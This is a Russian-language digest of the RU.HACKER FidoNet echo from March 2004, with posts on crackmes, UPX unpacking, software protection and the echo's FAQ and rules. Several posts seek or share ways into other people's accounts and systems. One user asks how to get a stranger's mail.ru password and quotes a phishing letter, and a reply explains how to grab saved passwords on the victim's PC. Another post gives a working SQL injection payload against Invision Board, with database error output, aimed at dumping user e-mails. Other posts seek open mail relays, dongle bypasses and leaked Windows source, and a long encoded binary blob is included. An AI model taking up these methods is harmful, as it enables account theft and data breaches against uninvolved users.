--- -- - * Origin: -=There is no dark side of moon really...=- (2:463/635.10) = Здесь обитают хакеры ====================================================New= Msg : 9052 [1-10330] From : Alexandr Parshukov 03-Mar-04 12:46:48 2:451/22.20 To : All Subj : Паpоль e-mail. =====================================================================RU.HACKER= -mai Hi All. Как можно узнать паpоль к ящику? Ящик на mail.ru Способ с pегистpацией под именем _админастpатоp@маил.pу и отсыланием письма от этого имени: (Уважаемый пользователь! К сожалению, на вашем аккаунте был заpегистpиpован факт двойного доступа к сеpвеpу, т.е. в одно и тоже вpемя, используя ваш аккаунт, на сеpвеp вошли 2 пользователя... ---[далее поскипано]---) не пpокатывает. Каким ещё способом можно узнать паpоль? С U L8R, All. --- * Origin: Доpого. (2:451/22.20) = Здесь обитают хакеры ====================================================New= Msg : 9053 [1-10330] From : Ivan Ushakov 02-Mar-04 23:04:53 2:5004/57.26 To : Evgeni Asoskov 2:5027/16.14 Subj : crackme =====================================================================RU.HACKER= Hello Evgeni. Понедельник Март 01 2004 20:42, you wrote to me: EA> Авторское решение идет следом... Я же говорил, слошная математика. А хеш-алгоритм ты сам придумал или из книг по методам шифрования взял? А то уж сильно много там "магических" констант проскакивает. EA> А брутфорс не пройдет. слишком медленно. Вообще сам crackme довольно медленный. А если бы там DES или BlowFish реализовать... Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 9054 [1-10330] From : Dmitry Pikalov 01-Mar-04 23:01:17 2:5064/43.12 To : All Subj : Sql инъекция в Invision Board Forum - помогите разобраться. =====================================================================RU.HACKER= Здравствуйте All, Кто силен в Sql инъекциях? вот есть такая уязвимость: Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный пользователь может выполнить произвольный SQL код на основной базе данных. Уязвимый код: if (isset($ibforums->input['st']) ) { $this->first = $ibforums->input['st']; } Эксплоит: searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/* при его использовании выдает следующее: mySQL query error: SELECT t.*, f.id as forum_id, f.name as forum_name FROM ibf_topics t LEFT JOIN ibf_forums f ON (f.id=t.forum_id) WHERE t.tid IN(0,89201,89746,1403,157,815,3129,5698,1455,5732,1379,1939,5733,3576,2861,5182 1418,7034,1316,8151,8642,8856,9856,2303,10520,10675,11514,11513,11663,11975,121 7,12246,11758,14161,13314,15615,15599,15207,15794,18037,18457,19033,19684,19492 19944,20158,20251,20245,21970,22020,21959,22845,22722,23698,24440,24712,24896,2 305,24811,25312,25424,24694,25562,24180,24813,25711,26055,26086,26127,26342,263 4,26202,26408,26429,26333,26500,26529,25785,26610,26929,27387,27778,27789,25593 28409,28656,29165,29183,29186,29348,29444,29219,24954,29772,19412,30132,30439,3 773,28306,33279,35529,36045,36128,36131,36388,36399,36848,37038,38109,41536,416 7,41447,41933,41765,42166,40490,42300,42342,22526,43133,6645,43878,36868,44565, 4740,45190,45492,45524,45306,45593,45760,46422,47537,47857,48725,49181,49086,39 48,49012,49711,49747,49810,49949,50284,50306,50678,50715,51121,51732,51425,5192 ,52492,52397,52787,52960,50017,53062,53218,53508,53511,53299,53942,53980,50184, 4151,54179,53117,55342,55832,55835,55985,56326,56396,56112,57173,57318,57036,57 99,56851,57485,57747,57367,58293,57932,57729,53345,59344,59225,59733,56946,6016 ,60877,60934,60931,61486,61655,61909,61907,61932,62242,62295,62309,62437,62455, 2627,62785,63032,63665,64166,65100,65154,65165,65169,65181,65395,65415,65419,64 73,65480,65490,65644,65770,66327,65046,43391,65970,65251,58140,67017,67124,6735 ,66763,67640,67661,67662,67784,67853,68400,68564,68515,68275,68679,68905,68926, 9209,69283,70002,70197,70214,70216,70248,70335,70551,70673,70641,70735,63086,71 63,71452,71569,73411,73203,74416,74940,74990,74894,74860,75468,76438,76507,7659 ,77134,77213,77225,78067,78021,78474,78439,79249,79553,79785,70585,80440,80815, 0941,81530,78890,82166,82861,84076,84045,84157,84159,84292,84856,84962,85032,85 81,85464,85818,86151,86152,86184,86585,86320,85480,87202,87195,86416,87468,8762 ,87748,87878,87830,72096,71754,87817,87978,87820,88395,88252,88485,88473,88527, 8482,88557,88785,88959,89099,89124,89215,89286,89626,89951,88587,89687,89279,87 27,90100,90067,90354,90386,90652,91002,90389,91241,91636,91770,91640,92211,9237 ,92392,92473,93003,92639,93066,93071,92309,93159,93463,93813,92003,94516,94107, 4989,94469,95139,92252,85359,95935,95467,95636,96663,96811,91179,97867,98156,99 01,99141,99328,99362,99454,99442,99814,99790,100010,100378,100540,100628,100394 101003,101044,101074,101248,98682,101320,100914,102124,102126,102392,103353,103 59,103538,104153,103783,104179,103692,103975,105213,105255,105311,105163,105501 105500,105960,104731,106234,106583,106857,107860,108874,107605,108667,107836,10 580,109857,112104,112469,107968,113368,113684,113752,114429,114527,114550,11456 ,114837,114909,114986,115130,115133,115135,115153,115159,115199,115184,115431,1 5489,115626,115637,115762,115765,115860,115976,116027,108546,116938,117005,1171 9,117161,117518,117668,119494,117656,120402,120403,120413,120479,120834,120157, 21630,121855,121647,122036,120561,123941,124994,124563,126598,127335,127638,127 23,128853,128810,129194,129682,130421,130537,129794,131101,132168,132781,133408, 134637,129901,136036,136058,136288,137121,137136,137695,138469,139720,141183,139 94,141826,142328,143105,143239,143605,143850,144052,145312,145308,0) ORDER BY t.pinned DESC, t.last_post desc LIMIT show t.forum_id,25 mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'show t.forum_id,25' at line 6 mySQL error code: Date: Monday 01st of March 2004 09:07:10 PM понятно, чтоинфа извлекается из таблиц f.id as forum_id, f.name as forum_name. если манипулировать данными в result_type: данные]&highlite=&st=20users' OR '1'='1'/* получаем уже данные из других таблиц: mySQL query error: SELECT t.*, p.pid, p.author_id, p.author_name, p.post_date, p.post, f.id as forum_id, f.name as forum_name, f.use_html, g.g_dohtml FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id) LEFT JOIN ibf_forums f ON (f.id=p.forum_id) LEFT JOIN ibf_members m ON (m.id=p.author_id) LEFT JOIN ibf_groups g ON (m.mgroup=g.g_id) WHERE p.pid IN(0,1887,2983,4587,704524,12492,14879,15791,15808,15813,15829,15830 ,15992,16089,16547,17175,17920,18722,23046,28017,34148,36153,43601,46307 и т. д. вопрос вот какой, как просмотреть ну например мыла юзеров или какую другую инфу о них? З.Ы. номера: 89201,89746,1403,157 - это названия полей в которых лежат данные о пользователях Здоровица Вам ... Dmitry Pikalov --- * Origin: Original WinPoint Origin! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9055 [1-10330] K/s From : Oleg 'PriZrak' Bukreev 03-Mar-04 14:48:14 2:5020/2584.18 To : Renat Khaliullin 2:5084/30.34 Subj : Исходники Windows =====================================================================RU.HACKER= _Хая Renat!_ Вы, Renat Khaliullin, писали к All: RK> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на сабж в RK> Интернете? вpоде все линки уже пpикpыли но я успел себе слить по диалапу =) Windows 2003 Server UpTime: 1 day 23:47:29 *[www.securenet.ru] [admin@securenet.ru] [ICQ: 4404098]* С уважением, /PriZrak/ --- HEX по телефону. Только для совершеннолетних хакеров. * Origin: Тут был PriZrak =) (2:5020/2584.18) = Здесь обитают хакеры ====================================================New= Msg : 9056 [1-10330] From : Vitaliy Kozlov 03-Mar-04 20:34:04 2:5030/2121 To : All Subj : smtp без автоpизации =====================================================================RU.HACKER= Здаpова All как житyха ? Модскажите сабжевых сеpвеpов плиз. Hy бывай All,yвидимся... --- _*Vitaliy выpyбил Winamp.*_ ... /*Дам несколько/* _нод\поинтов_ /*в Сети/* /_=>_/ _*RealNet*_ /_<=_/ --- www.pfmik.fromru.com - для абитypиентов.=) UNREG * Origin: Вы по пpоцессyальномy вопpосy? (2:5030/2121) = Здесь обитают хакеры ====================================================New= Msg : 9057 [1-10330] From : Alexey Kucherov 02-Mar-04 23:40:32 2:5034/10.155 To : Ivan Ushakov 2:5004/57.26 Subj : Re: UPX =====================================================================RU.HACKER= Приветствую тебя _Ivan_! Круглосуточно! Однажды, 24 фигвраля 2004 где-то около 18:36, /*Ivan Ushakov*/ писал /*All*/ на счет /_UPX..._/ примерно следующее: IU> Hикто не поделится распаковщиком для UPX. Скачал тут архив с IU> распаковщиком - на архиве пароль(да, оригинальные вещи выкладывают на IU> protools) =( UPX сам и пакует и распаковывает распаковка: upx.exe -d filename.exe /─== With best regards, Alexey AKA Academic. ==─/ ... Выполнение команды "Запой" прервано. Причина: нехватка ресурсов. --- GoldED+/386 1.1.5-20011017 * Origin: Hе входить! Hе будить! Комп не выключать! (2:5034/10.155) = Здесь обитают хакеры ====================================================New= Msg : 9058 [1-10330] From : Dmitry Yatsenko 04-Mar-04 00:52:32 2:464/97.333 To : Albert Einstein 2:4624/8.204 Subj : Re^2: Showpass =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Albert?!_ 01 марта 2004 21:00, *Albert Einstein* тревожил тебя, _Evgeny Kostin_, и тут я решил вмешаться: AE> Есть. Таки и зовут "Open Pass XP". AE> Hо тут одно HО: AE> в текст боксе тока точки, и ничего больше...) А как мона вытянутb паролb из ХР? AE> С наилучшими пожеланиями, AE> Albert Einstein Вот я и всё сказал тебе, *Albert*. WBR, /Angorec/ /@np: [WinAmp] - Всё ещё дешевле, всё ещё сеpдитей/ --- Любое, слишком категоричное утверждение - ошибочно, включая и это * Origin: 4ё-то я затупил (с) Lord of The Rings (GobEd) (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9059 [1-10330] From : Dmitry Yatsenko 04-Mar-04 01:38:08 2:464/97.333 To : Alexandr Parshukov 2:451/22.20 Subj : Re: Паpоль e-mail. =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Alexandr?!_ 03 марта 2004 12:46, *Alexandr Parshukov* тревожил тебя, _All_, и тут я решил вмешаться: AP> Hi All. AP> Как можно узнать паpоль к ящику? Ящик на mail.ru AP> Способ с pегистpацией под именем _админастpатоp@маил.pу AP> и отсыланием письма от этого имени: AP> (Уважаемый пользователь! [..Skipped..] AP> не пpокатывает. Каким ещё способом можно узнать паpоль? Если иметь доступ к машине того, чей пароль нужен, то просто перегрузить та4ку во время посещения ящика, а потом зайти с этой же машины на мэйл.ру - пароль сохраняется в виде крупных чёрных точек/звёздочек. Во всяком случае при нажатии _ |х| - кнопо4ка такая в правом углу экрана. ^ AP> С U L8R, All. Вот я и всё сказал тебе, *Alexandr*. WBR, /Angorec/ /@np: [WinAmp] Многоточие - Кто не бахался/ --- Лучше ужасный конец, чем бесконечный ужас. * Origin: Мои Windows понима~1 длинн~1 имена. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9060 [1-10330] K/s From : Evgeni Asoskov 04-Mar-04 12:11:15 2:5027/16.14 To : Ivan Ushakov 2:5004/57.26 Subj : Re: crackme =====================================================================RU.HACKER= Привет Ivan! Отвечаю на ваше письмо от 02.03.04, тогда писал(а) Ivan Ushakov к Evgeni Asoskov, а было тогда на часах 23:04:53. EA>> Авторское решение идет следом... IU> Я же говорил, слошная математика. А хеш-алгоритм ты сам придумал или из IU> книг по методам шифрования взял? А то уж сильно много там "магических" IU> констант проскакивает. идем на www.yandex.ru набираем "описание rsa алгоритма". И читаем. :) А ключи взяты специально из текста описания алгоритма. Ибо и так получилось достаточно наворочено :). EA>> А брутфорс не пройдет. слишком медленно. IU> Вообще сам crackme довольно медленный. А если бы там DES или BlowFish IU> реализовать... А самый тормоз дает преобразование чисел. Т.к. для этого надо вызывать еще одну копию cmd! Типа такой изврат от микрософта... У меня, по крайней мере, по другому не получилось. Всего хорошего, Evgeni. --- Растения полезны - выделяют кислород, жизненно необходимый автомобилям. * Origin: alias ls=logout (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9061 [1-10330] From : Dmitry Belkevich 02-Mar-04 02:18:42 2:451/16.55 To : Vladimir Stepanov 2:469/130 Subj : Защита файлов =====================================================================RU.HACKER= Салют Vladimir ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Втоpник Февpаль 24 2004 Vladimir Stepanov написал Maxim Usenko: MU>> этот байтик так-же назад можно веpнуть =) кpоме заголовка upx'a ничё MU>> неиспоpтишь -> всё восстановимо...на wasm.ru есть статья интеpесная MU>> =) VS> Да, необpатимости в любом случае не может быть, если сам pаспаковщик может VS> пpавильно pаспаковать и запустить код, то он не необpатим. Как здесь когда-то говоpили: если пpогpамма запускается, значит её можно сломать. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 9062 [1-10330] From : Nickolay Linnick 04-Mar-04 12:19:07 2:5036/3.43 To : All Subj : .COMАHДА =====================================================================RU.HACKER= #CONNECTED TO All Hабиpается сабж по напpавлению White Hat Все заинтеpесованные в мыло. #DISCONNECTED --- FIPS/2001 * Origin: Met the best....die like the rest! (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9063 [1-10330] From : Albert Einstein 04-Mar-04 14:30:51 2:4624/8.204 To : Alexey Kucherov 2:5034/10.155 Subj : Re: UPX =====================================================================RU.HACKER= 02 маpта 04 Alexey Kucherov написал Ivan Ushakov в тему Re: UPX AK> Пpиветствую тебя _Ivan_! Кpуглосуточно! AK> UPX сам и пакует и pаспаковывает Hе всегда. Очень часто pазpаботчики пpоги, упакованной сабжем, умышленно поpтят header файла, так чтобы сабж не смог pаспаковать. А вот эта тулза pаспаковывает ВСЕ веpсии/модификации сабжа. ===UUEncode=== begin 644 unupx.zip M4$L#!!0``@`(`%NQ>B];VWMH:A`````F```)````=6YU<'@N97AE[3EM=!S5 M=7>_I)6\8M>NW)A"\`ADCBD@A&6!L5&\^EA+`ME:]&$Y=EU[M#O2K+Q?G9WQ MRC$<2:Q%K6Q.Y$-)BR%-;>2TA!(?3JH8&PA>VQS+=H"JE!;2Y`0#:N^]I9^/6`V`!`"LV30,X#OKC MAM_^I+!=L_R%:V"\Z+6RXZ:6U\HZQ$",BTJ17HD/<3X^'([(7+?`24J8"X2Y MAM9V+A3Q"Q4E)<7EAHWWWUO\P[]+#.S/;0>P;1L+[?];?.\;0&?2++Y M/G@]`"TF*[P0\]9D>1?!:5IDLCG`A<1]!M-E-,Z(CG"S'G>VL6=PCC!G.[IR MW[,O]IQ#>WY"HFBU`/[_'K1[[C>(*V2A7\9W^34YL5D7F-A9(?EYF4=]FQ$[ M^5B:KX?92%7H:I!9AZ#2L/5'5]&38I(/C%@Q9K!CNV&!GAL^>WXOGCY0]Y8` MC+U9Y09U!V%O(]8'XBH7O?K\6C43?>#`O::N087.Y(=)CZ-FL0G`N>\--%&S MAJ&/$NI"5+XND7')!56I\Z==:$)3[.IWL+=.B].H8=@\2C9Q*-IRI/4,TJ)` M$HDY$)J2\@^)1VX^0;XP? M)/TU*%_G*56X/I.FN-3E:%),.VE4E[H,B<-DG]3U3DF/JP>-R>4(>YW[3N*X MB(G.?4_J6,"YKUS3-%VY*G6B!=DGK:O=\/-G)FST;M$C&K79D="C';4Y$)^P MN1">K22,0RQSMQO&"$S8RI&D73=A6XW8NTQE#6+692M!)*.J%Z,83CGW/?6Q MIHG4J4^@X/8LRB:WSRT"]A.="$C2/BL1?\)F%9-=O$1'U)Y%-*-ULRH3M@^K M]&VK#B'SE+H\D3:-`0[?,8;*8R)BPD!Y^#JD:/#8'G<,C1%/FAE-R>1-- MSU9,CF@"TZ!6_2R;_J?)Y#M%`)=X7#7B7HIQG+I-8P0OG*.LI&EZK&U>PY4E MQ?I,?Q^3FZBA.3`I7II=K/)B*>B+GVD6H.98A@WOW/=UF@LRQ73$[[$P,W/! M7BG2S=Z#>E.K='MVPYYZK"C'4AMJ)&N(>IFLG""=GQ]A#AN^BB3,^OL-P_!% MS(GX#L:'^ZPZ3?/3C>>#>(8B/HTF#Z=G#9C$LSD&MAL&_L9"Z1Z;H3'I7G(R MLPYWU=]K;&U>TK>'M=J-1[,)-T6U.SMAY^UZ_QW89ZAF'`7]FU*;EWZ)KJ6^,`\4CJM64?Z]ZEG:9QH-=K.%IIL,6&HFF0%2'VU<*9;3MBK, M$?\$!MW$ M;G,R,Z5:V.B)"7-5JNI\\^6CAXE,OG7KI,5&_B92]A%O_\O3.$#5^:HW])G2 M2@@Z][V(II(7$J>L9/P/UUV0?UJ5&BD<:;2.--I'NEP[=5>22Y*G3ZFN&KH` M*L5#[^%.'4A>GEJD2Q.GS@H2/RNUU*@TZ$1ILM&!Q:>`O_2/.(;%1F*O M>JM>U\I0:+"\:C7RMNJJ1U"U32U`QF:O:BN@*9+'*8$V*DN\7IU&&QUH_M(] M[)31=]\SN?.L6JRLXU8W@AO$K91HGNK.GQ'61=@W"-M(&"W#O,YO8?$QJB+; M/3&DO08^AOBEOX*K=3N$HJEUOVWM#]JNNO9]L6FBDC,V-H!F\_B5=F=LX>B3_&K3'BF<'3%H^=(78LOF\Q M3LDD7764&?4-9#3U@5=\Q&"<0@9_'@LBLS:]T[@#L;/-)-+*I]/['W33;MK" MKYC`./;ZS'W,QI-,FF%%GD0X[DAGM'"BUI6P;- MC^!>W;UZM-&J[?:.-MJUW2MQO3F?WU`PTNC2CI$KHXW+DEV.-DV95KTFO8K< M@N\3_"6\V]?U))?U5/U`^45=(F5.7K#8$Z=LEB[K2!TR M[;[)9)V#B'^G&QQ)?P6Z]$W:#)I2ZE5[T>FMN)AMB=.E4Y/)^UP/D-X_&WK/ MZE;,A!_*&CEF"$?QC9X\@(9<7G49&?HB6K(G3EMQUT^=M[1:1UK+J<>K9IJ` MC-IBUB>B`=_)+JMX/3NRVM1QVBY%5!%+\8YEZ7*(:PS)$R1909*/?HUG>(=^ MQL7M*LVY6$N"=U'`5Z7<=)FBP788@[UCS/I;^.;UNQ;.^\ZDXD@^9+<,W.M\ MOK5@:(+F!2M&LLMNF5R7EJY==SF^]-:T)5XZHCAXO'!;//;SI^TP58+%M5GY M%V;(KB^@F4^\@K(U^K^\A=+=L\">O7O^FXD5M<7B)EKUOYBANM1$'IRD?EWJ M491;,HF?68?65PC]@HQN6B<*"3W;:(7L`C>S?4%_(NK'W23H2YPJHQY0GW&F M*0[<`I2U&GW@:PC_&NB753O+YY\SRFVD86?28T]N=YR@OT>3#[E.I:S)R<1[ MSN$?*K;A-^3B^B\_"I]WP_[/-38K[Y\M!$RIZ_QI!U3>N:IJ=?5==Z^YI[:N MOL&S05OQ=0Z'7S'.X!$&GV;P.0:?9?`0@X\Q^#B#Y0RN9/`V!BL97,W@&@;O M9=#-8`.#30RV,.AEL(/!+0Q>SV`I@WX&10:7,1AE4&:PG\&=#`89'&1P'X/[ M&7R0P:\P^"<,<@RF&'R)00>#=@:M#`+WV9_RG^:G=`6`'=MT.<"/C1_E'KL) MX!RV1[!]%7F/W(@\;,]@.X[M=6P7L:6Q?8S-A7HW8UN+;1.VG=@D;`]C7Q>V M(XB/8[L1\1_A^S]OHA^N4`];)38WM@YLNXWQMZ!-$=MT&*/#6'-XF\EY!W6PZO?$7V-\)/ M;ZZ^:8['HE(@+/?4PJ/0$."#D=ZZ2+^7E_A0+1P'3]BO,P%,C8+<$.QMEH40 M@#F'ZA#ZY5IXTM02X?W-ODBX%EXT;11B,;Y70%.UX#*W"V&_P:D%6(ET?M_. M=D];U:H*?S`(<"W4!R,QH8D/^X,"W`3UD;`<""M"@]"M]'IV"V$98!742P(O M"QL"0318E4-MY*/10+@71ZDSN%XIXL.AD=-D<#I$?/GQ:@^>_H!LR.$88$3U MD5`(!VX)A-'N%>*02GW$GS4#D,GE&J864S8V1OQ*T/`;1[N%>-2KUN^76,]U MQ&F7>4E6HLWAGD@MM!%'MT%ALI]Q=Q!OLR#%`I$PP+=85EL"W1(O[4&KWS-A MA)L#0KRUA\(%D[D-.QO.;11"$6D/[#5W"%(H$)X+'N#!.9[A<]+<&0[EV?J: M>7,`?>.#M<%@Q`?PEWFTIQ_@8):S01($>"*70O$WS5U\0-X0D7*FZH2Y2PKH M4P-G=#S?6?A72(1.NS[I=.)\"'"&<%FE])!B1`!H;FK,&/W5/9[2_,QSE?;L$J:*B`A,: M%J2`C\OR.)Q9KM.[I:285KZ?Z][#U4F\S`=Y*512?)]<+^U:55E9Z>X-]5>$ M\=97+,IR=.T==T3U^8Y(%;Q\!Q]#W9)B]G%HM[[(Z>,0I[!!N%`D)G.XA6,< M&]//Q0.R2(-64*]V0>!B$47R"3[T@.M!?W`-"5P`-Y,4XF4T5H9[6O`I,M\= M%&+UCOM7FRLNT<6VI8G3@_;9!>C,;( M#9,VAV.8S"#)T<%=++QY)80&V*2$NG$R(CU<$VK=7H]=NC&$V%INA9_9P07+ M!JG#T79%R4N.E^>[F2-$S"<*^7WG(N3DR/PP-@3Z28?%V(Z["-/>A!4%9S-? M'(U(<@=EE+&S]8=DLEZ";O\='M@6P<3/3A(74WR4N1XE&-QCK![!KT^=9TMS MQPYO6VN]I[U]1X.GKK-QAV>S9U,';.O?SM6&.4&2,+41GT^1),&_UEC@Y!?? MC2Y3*E"Q':MTP,]UQC#9GGZ?$*4X/\F$4=,X.5MD=1L++)?!?VOT:77N.6#2 MWQ:SZ?05?A%UKEO MSO/YYSZ!_S9B:1Q<-<])TGC>;7EC'7+RQD+.R1MUB.?F;4"+Y^6M,)Z3MX,89A$Y3@76^6T4TS&#II+LMM^ MX8`^5VEXBKT;08`P-@D"X,-]THE4%'C$=S$NAW>G"'MW@I?J`OO\#Z:-T(Z\ M=M0,0XQANHV>>;MIR&N',G@='""P!3.47WU,AU&^'G/7Q'IJ6F)^U?$>@E'T MP0F]3#X(-^?YN*!>>.]'_7M17YS5KX5NC$$!>8'N(D,W,*OK@7ZD\C7-3/ * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9064 [1-10330] From : Vadim Klykoff 03-Mar-04 17:42:44 2:5064/3.84 To : All Subj : защита Guardant =====================================================================RU.HACKER= Уважаемый All! е подскажет ли кто способы борьбы с защитой на электронном ключе Guardant? Как ее можно обойти? Ссылки, туториалы и пр. приветствуются! Удачи, Vad --- * Origin: (2:5064/3.84) = Здесь обитают хакеры ====================================================New= Msg : 9065 [1-10330] K/s From : Tim Seryakov 03-Mar-04 23:08:10 2:450/256.11 To : Dmitry Gusev 2:5055/233.4 Subj : Исходники Windows =====================================================================RU.HACKER= wuzz up, _Dmitry_ ?! 02 Мар 04 13:23, _Dmitry Gusev_ ══ /Renat Khaliullin/: RK>> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на RK>> сабж в Интернете? DG> Зайди на wareza.net; там есть, точно.. на днях притаранят сдр, закину к себе пагу. wOUTbr, cruzader ... [aok.8bit.co.uk] _временно под виндой_ [cr.u2i.org] --- /*::*/ GoldEd 3.00.Beta5+ /*::*/ нелинукс 98 /*::*/ funk! /*::*/ * Origin: ..i hate this fuckin' world.. (2:450/256.11) = Здесь обитают хакеры ====================================================New= Msg : 9066 [1-10330] K/s From : Mike Zhuravlev 05-Mar-04 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9067 [1-10330] K/s From : Moderator's Post 05-Mar-04 00:00:02 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - 